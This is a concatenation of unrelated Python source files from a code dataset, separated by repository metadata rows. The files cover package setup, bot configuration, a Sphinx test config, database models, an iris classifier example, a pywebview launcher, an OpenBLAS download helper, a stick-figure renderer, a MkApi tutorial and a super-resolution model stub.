"wallet/ethereum/zero_ex/*.json",
"wallet/ethereum/token_abi/*.json",
"wallet/ethereum/erc20_tokens.json",
"wallet/ethereum/erc20_tokens_kovan.json",
"VERSION",
"templates/*TEMPLATE.yml"
],
}
install_requires = [
"aioconsole",
"aiokafka",
"attrdict",
"cytoolz",
"eth-abi",
"eth-account",
"eth-bloom",
"eth-hash",
"eth-keyfile",
"eth-keys",
"eth-rlp",
"eth-utils",
"hexbytes",
"kafka-python",
"lru-dict",
"parsimonious",
"pycryptodome",
"requests",
"rlp",
"toolz",
"tzlocal",
"urllib3",
"web3",
"websockets",
"aiohttp",
"async-timeout",
"attrs",
"certifi",
"chardet",
"cython==0.29.15",
"idna",
"idna_ssl",
"multidict",
"numpy",
"pandas",
"pytz",
"pyyaml",
"python-binance==0.7.5",
"sqlalchemy",
"ujson",
"yarl",
]
cython_kwargs = {
"language": "c++",
"language_level": 3,
}
if is_posix:
cython_kwargs["nthreads"] = cpu_count
if "DEV_MODE" in os.environ:
version += ".dev1"
package_data[""] = [
"*.pxd", "*.pyx", "*.h"
]
package_data["hummingbot"].append("core/cpp/*.cpp")
if len(sys.argv) > 1 and sys.argv[1] == "build_ext" and is_posix:
sys.argv.append(f"--parallel={cpu_count}")
setup(name="hummingbot",
version=version,
description="Hummingbot",
url="https://github.com/CoinAlpha/hummingbot",
author="CoinAlpha, Inc.",
author_email="[email protected]",
license="Apache 2.0",
packages=packages,
package_data=package_data,
install_requires=install_requires,
ext_modules=cythonize(["hummingbot/**/*.pyx"], **cython_kwargs),
include_dirs=[
np.get_include()
],
scripts=[
"bin/hummingbot.py",
"bin/hummingbot_quickstart.py"
],
)
if __name__ == "__main__":
main()
| 28.321212 | 74 | 0.563022 |
4a2104f5595c52a9384ed841f9422661c461e9ac | 1,357 | py | Python | bot/env.py | JNDevs/HariBot | 981771f98a497e49771d2fdef8ede289a96a63af | [
"MIT"
] | null | null | null | bot/env.py | JNDevs/HariBot | 981771f98a497e49771d2fdef8ede289a96a63af | [
"MIT"
] | null | null | null | bot/env.py | JNDevs/HariBot | 981771f98a497e49771d2fdef8ede289a96a63af | [
"MIT"
] | 1 | 2021-08-12T12:15:40.000Z | 2021-08-12T12:15:40.000Z | """This modules parses environment variables"""
# pylint: disable=R0903, E0611
from typing import Optional
from pydantic import BaseSettings, HttpUrl
from .core.helpers.config import DatabaseConfig, LavalinkConfig
__all__ = ("bot_config", "db_config", "lavalink_config")
class BotConfig(BaseSettings):
"""
Parses Bot config with environment variables
"""
prefix: str
token: str
webhook_url: HttpUrl
dev_env = False
private_bot: Optional[bool]
load_jishaku: Optional[bool]
class Config:
"""This is the config class containg info about env prefix and file"""
env_file = ".env"
env_prefix = "bot_"
class BotDatabaseConfig(BaseSettings, DatabaseConfig):
"""
Parses BoilerBot Database config with environment variables
"""
class Config:
"""This is the config class containg info about env prefix and file"""
env_file = ".env"
env_prefix = "postgres_"
class BotLavalinkConfig(BaseSettings, LavalinkConfig):
"""
Parses BoilerBot Database config with environment variables
"""
class Config:
"""This is the config class containg info about env prefix and file"""
env_file = ".env"
env_prefix = "lavalink_"
bot_config = BotConfig()
db_config = BotDatabaseConfig()
lavalink_config = BotLavalinkConfig()
| 22.245902 | 78 | 0.686809 |
4a21054ed8398a6e2ba5e1c03b0d64ec470ff2a3 | 291 | py | Python | tests/roots/test-templating/conf.py | zhsj/sphinx | 169297d0b76bf0b503033dadeb14f9a2b735e422 | [
"BSD-2-Clause"
] | 3 | 2019-06-11T09:42:08.000Z | 2020-03-10T15:57:09.000Z | tests/roots/test-templating/conf.py | zhsj/sphinx | 169297d0b76bf0b503033dadeb14f9a2b735e422 | [
"BSD-2-Clause"
] | 12 | 2019-01-09T15:43:57.000Z | 2020-01-21T10:46:30.000Z | tests/roots/test-templating/conf.py | zhsj/sphinx | 169297d0b76bf0b503033dadeb14f9a2b735e422 | [
"BSD-2-Clause"
] | 10 | 2019-02-04T11:49:35.000Z | 2020-03-21T13:32:20.000Z | # -*- coding: utf-8 -*-
project = 'Sphinx templating <Tests>'
source_suffix = '.txt'
keep_warnings = True
templates_path = ['_templates']
release = version = '2013.120'
exclude_patterns = ['_build']
extensions = ['sphinx.ext.autosummary']
autosummary_generate = ['autosummary_templating']
| 24.25 | 49 | 0.721649 |
4a2105b4dab85b4fa2676e3d11ce354fe0ef09fc | 692 | py | Python | src/backend/app/db/models/event.py | douglasdaly/dougliz-wedding | da673baf3a7387c3818960c0ffa12ab7c830a89b | [
"MIT"
] | 5 | 2020-02-02T02:39:23.000Z | 2021-08-17T15:50:57.000Z | src/backend/app/db/models/event.py | douglasdaly/dougliz-wedding | da673baf3a7387c3818960c0ffa12ab7c830a89b | [
"MIT"
] | 4 | 2021-03-31T19:39:57.000Z | 2022-01-22T09:29:10.000Z | src/backend/app/db/models/event.py | douglasdaly/dougliz-wedding | da673baf3a7387c3818960c0ffa12ab7c830a89b | [
"MIT"
] | 1 | 2020-04-12T17:11:43.000Z | 2020-04-12T17:11:43.000Z | # -*- coding: utf-8 -*-
"""
Person database storage model.
"""
import uuid
import sqlalchemy as sa
from sqlalchemy.orm import relationship
from app.db.base_class import Base
from app.db.types import GUID
class Event(Base):
"""
Database storage for Event objects.
"""
id = sa.Column(sa.Integer, primary_key=True)
uid = sa.Column(GUID, unique=True, index=True, default=uuid.uuid4)
name = sa.Column(sa.String, nullable=False, index=True)
date = sa.Column(sa.Date, nullable=False, index=True)
start = sa.Column(sa.Time)
end = sa.Column(sa.Time)
address_id = sa.Column(sa.Integer, sa.ForeignKey('addresses.id'))
address = relationship("Address")
| 23.862069 | 70 | 0.687861 |
4a2107bab26885af4773e5df8ab4534b431c7289 | 277 | py | Python | trinity/sync/common/constants.py | dendisuhubdy/trinity | 001664781259c7dd0779a0ef6f822451b608ded4 | [
"MIT"
] | 3 | 2019-06-17T13:59:20.000Z | 2021-05-02T22:09:13.000Z | trinity/sync/common/constants.py | dendisuhubdy/trinity | 001664781259c7dd0779a0ef6f822451b608ded4 | [
"MIT"
] | 2 | 2019-04-30T06:22:12.000Z | 2019-06-14T04:27:18.000Z | trinity/sync/common/constants.py | dendisuhubdy/trinity | 001664781259c7dd0779a0ef6f822451b608ded4 | [
"MIT"
] | 2 | 2019-09-05T01:31:56.000Z | 2019-09-17T09:09:16.000Z | # If a peer returns 0 results, wait this many seconds before asking it for anything else
EMPTY_PEER_RESPONSE_PENALTY = 15.0
# Picked a reorg number that is covered by a single skeleton header request,
# which covers about 6 days at 15s blocks
MAX_SKELETON_REORG_DEPTH = 35000
| 39.571429 | 88 | 0.801444 |
4a2107d24b5a0f7eb792a89caa8ac94245cc63dc | 176 | py | Python | test/vtgate_gateway_flavor/__init__.py | bowlofstew/vitess | 659c6c0582cdb4f5d3defcd3dbfc1a5f839cabc8 | [
"BSD-3-Clause"
] | 1 | 2017-06-29T04:57:43.000Z | 2017-06-29T04:57:43.000Z | test/vtgate_gateway_flavor/__init__.py | AndyDiamondstein/vitess | 295c300cd22c109f8be7a454c03c96c6b8e3b55c | [
"BSD-3-Clause"
] | null | null | null | test/vtgate_gateway_flavor/__init__.py | AndyDiamondstein/vitess | 295c300cd22c109f8be7a454c03c96c6b8e3b55c | [
"BSD-3-Clause"
] | 3 | 2017-04-03T21:07:17.000Z | 2020-03-04T04:59:05.000Z | #!/usr/bin/env python
# Copyright 2015, Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
| 29.333333 | 69 | 0.744318 |
4a21096da7e160970f2eb66ddd4934be924a9e12 | 2,335 | py | Python | app/model.py | schuderer/mllaunchpad-template | 2fa0b39c8c6e879e3ebc57fa863d50e4f3262d2b | [
"Apache-2.0"
] | 2 | 2020-03-03T23:18:19.000Z | 2020-03-04T21:54:40.000Z | app/model.py | schuderer/mllaunchpad-template | 2fa0b39c8c6e879e3ebc57fa863d50e4f3262d2b | [
"Apache-2.0"
] | 6 | 2020-02-21T13:31:43.000Z | 2020-06-15T14:23:59.000Z | app/model.py | schuderer/mllaunchpad-template | 2fa0b39c8c6e879e3ebc57fa863d50e4f3262d2b | [
"Apache-2.0"
] | null | null | null | from mllaunchpad import ModelInterface, ModelMakerInterface
from sklearn.metrics import accuracy_score, confusion_matrix
from sklearn import tree
import pandas as pd
import logging
from app.example_import import clean_string
logger = logging.getLogger(__name__)
# Train this example from the command line:
# python -m mllaunchpad -c tree_cfg.yml -t
#
# Start REST API:
# python -m mllaunchpad -c tree_cfg.yml -a
#
# Example API call:
# http://127.0.0.1:5000/iris/v0/varieties?sepal.length=4.9&sepal.width=2.4&petal.length=3.3&petal.width=1
#
# Example with URI Param (Resource ID):
# http://127.0.0.1:5000/iris/v0/varieties/12?hallo=metric
#
# Example to trigger batch prediction (not really the idea of an API...):
# http://127.0.0.1:5000/iris/v0/varieties
class MyExampleModelMaker(ModelMakerInterface):
"""Creates a model
"""
def create_trained_model(self, model_conf, data_sources, data_sinks, old_model=None):
logger.info(clean_string("using our imported module"))
df = data_sources['petals'].get_dataframe()
X = df.drop('variety', axis=1)
y = df['variety']
my_tree = tree.DecisionTreeClassifier()
my_tree.fit(X, y)
return my_tree
def test_trained_model(self, model_conf, data_sources, data_sinks, model):
df = data_sources['petals_test'].get_dataframe()
X_test = df.drop('variety', axis=1)
y_test = df['variety']
my_tree = model
y_predict = my_tree.predict(X_test)
acc = accuracy_score(y_test, y_predict)
conf = confusion_matrix(y_test, y_predict).tolist()
metrics = {'accuracy': acc, 'confusion_matrix': conf}
return metrics
class MyExampleModel(ModelInterface):
"""Uses the created Data Science Model
"""
def predict(self, model_conf, data_sources, data_sinks, model, args_dict):
logger.info(clean_string("using our imported module"))
logger.info('Doing "normal" prediction')
X = pd.DataFrame({
'sepal.length': [args_dict['sepal.length']],
'sepal.width': [args_dict['sepal.width']],
'petal.length': [args_dict['petal.length']],
'petal.width': [args_dict['petal.width']]
})
my_tree = model
y = my_tree.predict(X)[0]
return {'iris_variety': y}
| 29.556962 | 105 | 0.665953 |
4a2109f2ce56ab419c3eeaeaf540961bedc96658 | 5,424 | py | Python | main.py | KingJellycycle/Neutralino-Deimos | 2871851aabc484f7cabc224aec5415a6423827c3 | [
"MIT"
] | null | null | null | main.py | KingJellycycle/Neutralino-Deimos | 2871851aabc484f7cabc224aec5415a6423827c3 | [
"MIT"
] | null | null | null | main.py | KingJellycycle/Neutralino-Deimos | 2871851aabc484f7cabc224aec5415a6423827c3 | [
"MIT"
] | null | null | null | import codecs
import webview
import urllib.request
import xml.dom.minidom
import json
import os
from gamemanager import GameManager
_server_address = "http://192.168.0.196/"
_news_address = "https://www.kingjellycycle.com/feed.xml"
class Api():
def __init__(self):
self.window = False
self.mainview = False
self._settings = {
"theme": "dark",
"custom_css": "",
"default_page": "home",
"background_update": "enabled",
"show_desktop_notifications": "enabled",
"storage_dir": "./Deimos_Storage",
"bound_dir": "./Deimos_Storage/bound",
"bound_version": ""
}
self.create_directories()
self.load_settings()
self.gm = GameManager(_server_address, self._settings["bound_dir"])
def ping_servers():
# [1] = server address, [2] = news address
servers_active = [False,False]
try:
urllib.request.urlopen(_server_address)
servers_active[0] = True
except:
servers_active[0] = False
try:
urllib.request.urlopen(_news_address)
servers_active[1] = True
except:
servers_active[1] = False
def set_page(self, page):
file = codecs.open("./src/pages/"+page, "r", "utf-8")
return file.read()
def get_news(self):
articles = []
fetch = urllib.request.urlopen(_news_address)
data = fetch.read()
fetch.close()
xmlParsed = xml.dom.minidom.parseString(data)
for item in xmlParsed.getElementsByTagName('entry'):
if item.getElementsByTagName('category')[0].getAttribute('term') == "Personal":
continue
#print(item.getElementsByTagName('link')[0].getAttribute('href'))
title = item.getElementsByTagName('title')[0].childNodes[0].data
link = item.getElementsByTagName('link')[0].getAttribute('href')
date = item.getElementsByTagName('published')[0].childNodes[0].data
category = item.getElementsByTagName('category')[0].getAttribute('term')
summary = item.getElementsByTagName('summary')[0].childNodes[0].data
content = item.getElementsByTagName('content')[0].childNodes[0].data
post = {
"title": title,
"link": link,
"date": date,
"category": category,
"summary": summary,
"content": content
}
articles.append(post)
return articles
def get_patches(self):
fetch = urllib.request.urlopen(_server_address+ "bound/patches/latest.json")
data = fetch.read()
fetch.close()
dataParse = json.loads(data)
patches = []
for p in dataParse['prev_versions']:
info = urllib.request.urlopen(_server_address+ "bound/patches/"+p+"/patch.json")
infoData = info.read()
info.close()
infoParse = json.loads(infoData)
notes = ""
for note in infoParse['patch_notes']:
notes += "<div class='note'>"+note+"</div>"
patch = {
"version": p,
"title": infoParse['title'],
"description": infoParse['description'],
"date": infoParse['date'],
"notes": notes
}
patches.append(patch)
return patches
def set_settings(self,settings):
self._settings = settings
def save_settings(self):
# write settings to file settings.json in director storage_dir
with open(self._settings["storage_dir"] + "/settings.json", "w") as f:
json.dump(self._settings, f)
def load_settings(self):
# load settings from file settings.json in director storage_dir
if os.path.exists(self._settings["storage_dir"] + "/settings.json"):
with open(self._settings["storage_dir"] + "/settings.json", "r") as f:
self._settings = json.load(f)
else:
self.save_settings()
#print(self._settings)
return self._settings
def minimise_app(self):
window.minimize()
def exit_app(self):
self.save_settings()
window.destroy()
def create_directories(self):
if not os.path.exists(self._settings["storage_dir"]):
os.makedirs(self._settings["storage_dir"])
if not os.path.exists(self._settings["bound_dir"]):
os.makedirs(self._settings["bound_dir"])
if not os.path.exists(self._settings["storage_dir"] + "/bound"):
os.makedirs(self._settings["storage_dir"] + "/bound")
if __name__ == '__main__':
api = Api()
window = webview.create_window('Deimos', './src/index.html',js_api=api, width=1024, height=600, \
x=None, y=None, resizable=False, fullscreen=False, \
min_size=(1024, 600), hidden=False, frameless=True, \
minimized=False, on_top=False, confirm_close=False, \
background_color='#111', text_select=False,easy_drag=False)
# Set Dragable part of window and start the window
webview.DRAG_REGION_SELECTOR = '#draggable'
webview.start(debug=True) | 32.674699 | 101 | 0.569875 |
4a210a1ea3997ffc2344b7679df9e4582e4d829c | 4,069 | py | Python | docs/usage/library.py | Ahrak/mkapi | fdae77dac6fde1788a323e0e3c76adda8959f31e | [
"MIT"
] | null | null | null | docs/usage/library.py | Ahrak/mkapi | fdae77dac6fde1788a323e0e3c76adda8959f31e | [
"MIT"
] | null | null | null | docs/usage/library.py | Ahrak/mkapi | fdae77dac6fde1788a323e0e3c76adda8959f31e | [
"MIT"
] | null | null | null | """md
# Using MkApi within Python
MkApi is a standalone library as well as a MkDocs plugin, so that you can use it
within Python.
First, import MkApi:
{{ # cache:clear }}
<style type="text/css"> <!-- .mkapi-node { border: 2px dashed #88AA88; } -->
</style>
"""
import mkapi
# ## Node object
# Define a simple class to show how MkApi works.
class A:
"""Class docstring.
Note:
Docstring of `__init__()` is deleted, if there is
a class-level docstring.
"""
def __init__(self):
"""Init docstring."""
self.a: int = 1 #: Integer **attribute**.
def to_str(self, x: int) -> str:
"""Converts `int` to `str`.
Args:
x: Input **value**.
"""
return str(x)
# `mkapi.get_node()` generates a `Node` object that has tree structure.
# -
node = mkapi.get_node(A)
type(node)
# Some attributes:
node.object.kind, node.object.name
# -
docstring = node.docstring
len(docstring.sections) # type:ignore
# -
section = docstring.sections[0] # type:ignore
section.name, section.markdown
# -
section = docstring.sections[1] # type:ignore
section.name, section.markdown
# The `members` attribute gives children, for example, bound methods of a class.
len(node.members)
# -
child = node.members[0]
type(child)
# Elements of `Node.members` are also `Node` objects, so this is a tree structure.
child.object.kind, child.object.name
# -
docstring = child.docstring
len(docstring.sections) # type:ignore
# -
section = docstring.sections[0] # type:ignore
section.name, section.markdown
# -
section = docstring.sections[1] # type:ignore
section.name, section.markdown
# The above Parameters section has an empty `markdown`, while its `items` represents an
# argument list:
item = section.items[0]
print(item)
print(item.type)
print(item.description)
# `Node.get_markdown()` creates a *joint* Markdown of this node.
markdown = node.get_markdown()
print(markdown)
# Where is Note or Parameters section heading, *etc.*? No problem. The
# `Node.get_markdown()` divides docstrings into two parts. One is a plain Markdown that
# will be converted into HTML by any Markdown converter, for example, MkDocs. The other
# is the outline structure of docstrings such as sections or arguments that will be
# processed by MkApi itself.
# ## Converting Markdown
# For simplicity, we use [Python-Markdown](https://python-markdown.github.io/) library
# instead of MkDocs.
from markdown import Markdown # isort:skip
converter = Markdown()
html = converter.convert(markdown)
print(html)
# ## Distributing HTML
# `Node.set_html()` distributes HTML into docstring and members.
node.set_html(html)
# Take a look at what happened.
section = node.docstring.sections[0] # type:ignore
section.markdown, section.html
# -
child = node.members[0]
section = child.docstring.sections[0] # type:ignore
section.markdown, section.html
# -
section = child.docstring.sections[1] # type:ignore
item = section.items[0]
item.description.markdown, item.description.html # A <p> tag is deleted.
# ## Constructing HTML
# Finally, construct HTML calling `Node.get_html()` that internally uses
# [Jinja](https://jinja.palletsprojects.com/en/2.11.x/) library.
html = node.get_html()
print(html[:300].strip())
# [Jupyter](https://jupyter.org/) allows us to see the rendered HTML.
from IPython.display import HTML # isort:skip
HTML(html)
# ## Summary
# All you need to get the documentation of an object is described by the following
# function.
from markdown import Markdown # isort:skip
import mkapi # isort:skip
def get_html(obj) -> str:
# Construct a node tree structure.
node = mkapi.get_node(obj)
# Create a joint Markdown from components of the node.
markdown = node.get_markdown()
# Convert it into HTML by any external converter.
converter = Markdown()
html = converter.convert(markdown)
# Split and distribute the HTML into original components.
node.set_html(html)
# Render the node to create final HTML.
return node.get_html()
| 23.119318 | 87 | 0.702138 |
4a210b9e53e4a1f2fe704ae10bbb4892f4dda987 | 2,352 | py | Python | code/renderstick.py | cflamant/3d-pose-reconstruction | 8847a1eba88fe216b72ad74a21707e8d877bc63c | [
"MIT"
] | 5 | 2019-07-20T13:26:20.000Z | 2021-01-30T12:53:05.000Z | code/renderstick.py | cflamant/3d-pose-reconstruction | 8847a1eba88fe216b72ad74a21707e8d877bc63c | [
"MIT"
] | null | null | null | code/renderstick.py | cflamant/3d-pose-reconstruction | 8847a1eba88fe216b72ad74a21707e8d877bc63c | [
"MIT"
] | 1 | 2021-01-30T12:53:08.000Z | 2021-01-30T12:53:08.000Z | #!/usr/bin/env python
#Author: Cedric Flamant
import numpy as np
import vpython as vp
#import matplotlib.pyplot as plt
#from mpl_toolkits.mplot3d import Axes3D
import angletopos
def tovec(arr):
"""Converts numpy 3-vector into vp.vector
Input =>
arr: 3 element numpy array
Returns =>
vec: vpython vector
"""
return vp.vec(arr[0],arr[1],arr[2])
def renderstick(positions):
'''Draws the stick figure in 3D
Input
positions: 2d array of joint positions.
'''
vp.scene.caption = """Right button drag or Ctrl-drag to rotate "camera" to view scene.
To zoom, drag with middle button or Alt/Option depressed, or use scroll wheel.
On a two-button mouse, middle is left + right.
Shift-drag to pan left/right and up/down.
Touch screen: pinch/extend to zoom, swipe or two-finger rotate."""
vp.scene.width = 800
vp.scene.height = 600
avpos = np.average(positions,axis=0)
pos = positions - np.tile(avpos,(15,1))
rarm = vp.curve(pos=[tovec(pos[3,:]),tovec(pos[7,:]),tovec(pos[11,:])],radius=1)
shoulders = vp.curve(pos=[tovec(pos[3,:]),tovec(pos[4,:])],radius=1)
larm = vp.curve(pos=[tovec(pos[4,:]),tovec(pos[8,:]),tovec(pos[12,:])],radius=1)
spine = vp.curve(pos=[tovec(pos[0,:]),tovec(pos[2,:])],radius=1)
hips = vp.curve(pos=[tovec(pos[5,:]),tovec(pos[6,:])],radius=1)
rleg = vp.curve(pos=[tovec(pos[5,:]),tovec(pos[9,:]),tovec(pos[13,:])],radius=1)
lleg = vp.curve(pos=[tovec(pos[6,:]),tovec(pos[10,:]),tovec(pos[14,:])],radius=1)
head = vp.sphere(pos=tovec(pos[0,:]), radius=3.)
rshoulder = vp.sphere(pos=tovec(pos[3,:]), radius=2., color=vp.color.orange)
lshoulder = vp.sphere(pos=tovec(pos[4,:]), radius=2., color=vp.color.orange)
rhip = vp.sphere(pos=tovec(pos[5,:]), radius=2., color=vp.color.orange)
lhip = vp.sphere(pos=tovec(pos[6,:]), radius=2., color=vp.color.orange)
relbow = vp.sphere(pos=tovec(pos[7,:]), radius=2., color=vp.color.orange)
lelbow = vp.sphere(pos=tovec(pos[8,:]), radius=2., color=vp.color.orange)
rknee = vp.sphere(pos=tovec(pos[9,:]), radius=2., color=vp.color.orange)
lknee = vp.sphere(pos=tovec(pos[10,:]), radius=2., color=vp.color.orange)
if __name__=="__main__":
angles = np.zeros((11,2))
pos = angletopos.ang2pos(np.zeros(3),angles)
renderstick(pos)
| 39.864407 | 90 | 0.642432 |
4a210cfe1c718631e6cbaa860e979862e99efa60 | 10,567 | py | Python | tools/openblas_support.py | rushabh-v/numpy | f30b2564d3923b2c307a026e4a22d20bc19872f0 | [
"BSD-3-Clause"
] | 2 | 2020-02-28T09:28:20.000Z | 2020-10-12T07:11:28.000Z | tools/openblas_support.py | rushabh-v/numpy | f30b2564d3923b2c307a026e4a22d20bc19872f0 | [
"BSD-3-Clause"
] | null | null | null | tools/openblas_support.py | rushabh-v/numpy | f30b2564d3923b2c307a026e4a22d20bc19872f0 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import division, absolute_import, print_function
import os
import sys
import glob
import shutil
import textwrap
import platform
try:
from urllib.request import urlopen
from urllib.error import HTTPError
except:
#Python2
from urllib2 import urlopen, HTTPError
from tempfile import mkstemp, gettempdir
import zipfile
import tarfile
OPENBLAS_V = 'v0.3.7'
OPENBLAS_LONG = 'v0.3.7'
BASE_LOC = ''
RACKSPACE = 'https://3f23b170c54c2533c070-1c8a9b3114517dc5fe17b7c3f8c63a43.ssl.cf2.rackcdn.com'
ARCHITECTURES = ['', 'windows', 'darwin', 'arm', 'x86', 'ppc64']
IS_32BIT = sys.maxsize < 2**32
def get_arch():
if platform.system() == 'Windows':
ret = 'windows'
elif platform.system() == 'Darwin':
ret = 'darwin'
# Python3 returns a named tuple, but Python2 does not, so we are stuck
elif 'arm' in os.uname()[-1]:
ret = 'arm';
elif 'aarch64' in os.uname()[-1]:
ret = 'arm';
elif 'x86' in os.uname()[-1]:
ret = 'x86'
elif 'ppc64' in os.uname()[-1]:
ret = 'ppc64'
else:
ret = ''
assert ret in ARCHITECTURES
return ret
def get_ilp64():
if os.environ.get("NPY_USE_BLAS_ILP64", "0") == "0":
return None
if IS_32BIT:
raise RuntimeError("NPY_USE_BLAS_ILP64 set on 32-bit arch")
return "64_"
def download_openblas(target, arch, ilp64):
fnsuffix = {None: "", "64_": "64_"}[ilp64]
filename = ''
if arch == 'arm':
# ARMv8 OpenBLAS built using script available here:
# https://github.com/tylerjereddy/openblas-static-gcc/tree/master/ARMv8
# build done on GCC compile farm machine named gcc115
# tarball uploaded manually to an unshared Dropbox location
filename = ('https://www.dropbox.com/s/vdeckao4omss187/'
'openblas{}-{}-armv8.tar.gz?dl=1'.format(fnsuffix, OPENBLAS_V))
typ = 'tar.gz'
elif arch == 'ppc64':
# build script for POWER8 OpenBLAS available here:
# https://github.com/tylerjereddy/openblas-static-gcc/blob/master/power8
# built on GCC compile farm machine named gcc112
# manually uploaded tarball to an unshared Dropbox location
filename = ('https://www.dropbox.com/s/yt0d2j86x1j8nh1/'
'openblas{}-{}-ppc64le-power8.tar.gz?dl=1'.format(fnsuffix, OPENBLAS_V))
typ = 'tar.gz'
elif arch == 'darwin':
filename = '{0}/openblas{1}-{2}-macosx_10_9_x86_64-gf_1becaaa.tar.gz'.format(
RACKSPACE, fnsuffix, OPENBLAS_LONG)
typ = 'tar.gz'
elif arch == 'windows':
if IS_32BIT:
suffix = 'win32-gcc_7_1_0.zip'
else:
suffix = 'win_amd64-gcc_7_1_0.zip'
filename = '{0}/openblas{1}-{2}-{3}'.format(RACKSPACE, fnsuffix, OPENBLAS_LONG, suffix)
typ = 'zip'
elif arch == 'x86':
if IS_32BIT:
suffix = 'manylinux1_i686.tar.gz'
else:
suffix = 'manylinux1_x86_64.tar.gz'
filename = '{0}/openblas{1}-{2}-{3}'.format(RACKSPACE, fnsuffix, OPENBLAS_LONG, suffix)
typ = 'tar.gz'
if not filename:
return None
print("Downloading:", filename, file=sys.stderr)
try:
with open(target, 'wb') as fid:
fid.write(urlopen(filename).read())
except HTTPError:
print('Could not download "%s"' % filename)
return None
return typ
def setup_openblas(arch=get_arch(), ilp64=get_ilp64()):
'''
Download and setup an openblas library for building. If successful,
the configuration script will find it automatically.
Returns
-------
msg : str
path to extracted files on success, otherwise indicates what went wrong
To determine success, do ``os.path.exists(msg)``
'''
_, tmp = mkstemp()
if not arch:
raise ValueError('unknown architecture')
typ = download_openblas(tmp, arch, ilp64)
if not typ:
return ''
if arch == 'windows':
if not typ == 'zip':
return 'expecting to download zipfile on windows, not %s' % str(typ)
return unpack_windows_zip(tmp)
else:
if not typ == 'tar.gz':
return 'expecting to download tar.gz, not %s' % str(typ)
return unpack_targz(tmp)
def unpack_windows_zip(fname):
import sysconfig
with zipfile.ZipFile(fname, 'r') as zf:
# Get the openblas.a file, but not openblas.dll.a nor openblas.dev.a
lib = [x for x in zf.namelist() if OPENBLAS_LONG in x and
x.endswith('a') and not x.endswith('dll.a') and
not x.endswith('dev.a')]
if not lib:
return 'could not find libopenblas_%s*.a ' \
'in downloaded zipfile' % OPENBLAS_LONG
target = os.path.join(gettempdir(), 'openblas.a')
with open(target, 'wb') as fid:
fid.write(zf.read(lib[0]))
return target
def unpack_targz(fname):
target = os.path.join(gettempdir(), 'openblas')
if not os.path.exists(target):
os.mkdir(target)
with tarfile.open(fname, 'r') as zf:
# Strip common prefix from paths when unpacking
prefix = os.path.commonpath(zf.getnames())
extract_tarfile_to(zf, target, prefix)
return target
def extract_tarfile_to(tarfileobj, target_path, archive_path):
"""Extract TarFile contents under archive_path/ to target_path/"""
target_path = os.path.abspath(target_path)
def get_members():
for member in tarfileobj.getmembers():
if archive_path:
norm_path = os.path.normpath(member.name)
if norm_path.startswith(archive_path + os.path.sep):
member.name = norm_path[len(archive_path)+1:]
else:
continue
dst_path = os.path.abspath(os.path.join(target_path, member.name))
if os.path.commonpath([target_path, dst_path]) != target_path:
# Path not under target_path, probably contains ../
continue
yield member
tarfileobj.extractall(target_path, members=get_members())
def make_init(dirname):
'''
Create a _distributor_init.py file for OpenBlas
'''
with open(os.path.join(dirname, '_distributor_init.py'), 'wt') as fid:
fid.write(textwrap.dedent("""
'''
Helper to preload windows dlls to prevent dll not found errors.
Once a DLL is preloaded, its namespace is made available to any
subsequent DLL. This file originated in the numpy-wheels repo,
and is created as part of the scripts that build the wheel.
'''
import os
from ctypes import WinDLL
import glob
if os.name == 'nt':
# convention for storing / loading the DLL from
# numpy/.libs/, if present
try:
basedir = os.path.dirname(__file__)
except:
pass
else:
libs_dir = os.path.abspath(os.path.join(basedir, '.libs'))
DLL_filenames = []
if os.path.isdir(libs_dir):
for filename in glob.glob(os.path.join(libs_dir,
'*openblas*dll')):
# NOTE: would it change behavior to load ALL
# DLLs at this path vs. the name restriction?
WinDLL(os.path.abspath(filename))
DLL_filenames.append(filename)
if len(DLL_filenames) > 1:
import warnings
warnings.warn("loaded more than 1 DLL from .libs:\\n%s" %
"\\n".join(DLL_filenames),
stacklevel=1)
"""))
def test_setup(arches):
'''
Make sure all the downloadable files exist and can be opened
'''
def items():
for arch in arches:
yield arch, None
if arch in ('x86', 'darwin', 'windows'):
yield arch, '64_'
for arch, ilp64 in items():
if arch == '':
continue
target = None
try:
try:
target = setup_openblas(arch, ilp64)
except:
print('Could not setup %s' % arch)
raise
if not target:
raise RuntimeError('Could not setup %s' % arch)
print(target)
if arch == 'windows':
if not target.endswith('.a'):
raise RuntimeError("Not .a extracted!")
else:
files = glob.glob(os.path.join(target, "lib", "*.a"))
if not files:
raise RuntimeError("No lib/*.a unpacked!")
finally:
if target is not None:
if os.path.isfile(target):
os.unlink(target)
else:
shutil.rmtree(target)
def test_version(expected_version, ilp64=get_ilp64()):
"""
Assert that expected OpenBLAS version is
actually available via NumPy
"""
import numpy
import ctypes
dll = ctypes.CDLL(numpy.core._multiarray_umath.__file__)
if ilp64 == "64_":
get_config = dll.openblas_get_config64_
else:
get_config = dll.openblas_get_config
get_config.restype=ctypes.c_char_p
res = get_config()
print('OpenBLAS get_config returned', str(res))
check_str = b'OpenBLAS %s' % expected_version[0].encode()
assert check_str in res
if ilp64:
assert b"USE64BITINT" in res
else:
assert b"USE64BITINT" not in res
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description='Download and expand an OpenBLAS archive for this ' \
'architecture')
parser.add_argument('--test', nargs='*', default=None,
help='Test different architectures. "all", or any of %s' % ARCHITECTURES)
parser.add_argument('--check_version', nargs=1, default=None,
help='Check provided OpenBLAS version string against available OpenBLAS')
args = parser.parse_args()
if args.check_version is not None:
test_version(args.check_version)
elif args.test is None:
print(setup_openblas())
else:
if len(args.test) == 0 or 'all' in args.test:
test_setup(ARCHITECTURES)
else:
test_setup(args.test)
| 36.064846 | 95 | 0.578972 |
4a210d0c546c86bb93fc7cf915d9df44f9315653 | 1,837 | py | Python | SR/code/model/mdsr.py | Whoo-jl/Pyramid-Attention-Networks | ec20b3fecf590bebc7188eac03a571e69aa6088f | [
"MIT"
] | 338 | 2020-04-30T01:07:49.000Z | 2022-03-29T03:36:56.000Z | code/model/mdsr.py | HarukiYqM/3D_Appearance_SR | 0e4d3a4476afe1ccf16f0e8fee3d697c0d204395 | [
"MIT"
] | 21 | 2020-05-02T14:10:51.000Z | 2021-05-21T08:32:42.000Z | code/model/mdsr.py | HarukiYqM/3D_Appearance_SR | 0e4d3a4476afe1ccf16f0e8fee3d697c0d204395 | [
"MIT"
] | 56 | 2020-04-30T08:09:38.000Z | 2022-03-14T06:23:34.000Z | from model import common
import torch.nn as nn
def make_model(args, parent=False):
return MDSR(args)
class MDSR(nn.Module):
def __init__(self, args, conv=common.default_conv):
super(MDSR, self).__init__()
n_resblocks = args.n_resblocks
